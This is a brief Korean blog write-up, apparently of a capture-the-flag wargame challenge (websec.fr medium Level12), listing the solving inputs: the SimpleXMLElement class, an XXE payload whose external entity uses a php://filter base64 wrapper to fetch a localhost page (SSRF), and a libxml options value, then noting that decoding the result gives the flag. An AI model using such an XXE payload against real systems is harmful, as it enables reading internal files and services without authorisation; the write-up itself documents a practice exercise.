Plit00's Story

[Websec.fr] medium - Level12 본문

Wargame/websec.fr

[Websec.fr] medium - Level12

plit00 2019. 8. 16. 06:50

  • Class : SimpleXMLElement
  • First parameter : <!DOCTYPE scan [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=http://127.0.0.1/level12/index.php">]> <scan>&test;</scan>
  • Second parameter : 6
  • XML Element 
  • SSRF 

10진수, 16진수, hex값으로 값이 범위이다.

 

이것을 base64로 돌리면 flag가 나온다 

'Wargame > websec.fr' 카테고리의 다른 글

[Websec.fr] Easy - Level24  (0) 2019.08.16
[Websec.fr] Hard - Level14  (0) 2019.08.16
[Websec.fr] Hard - level23  (0) 2019.04.12
[Websec.fr] medium - level3  (0) 2019.04.08
[Websec.fr] medium - Level5  (0) 2019.04.08
Comments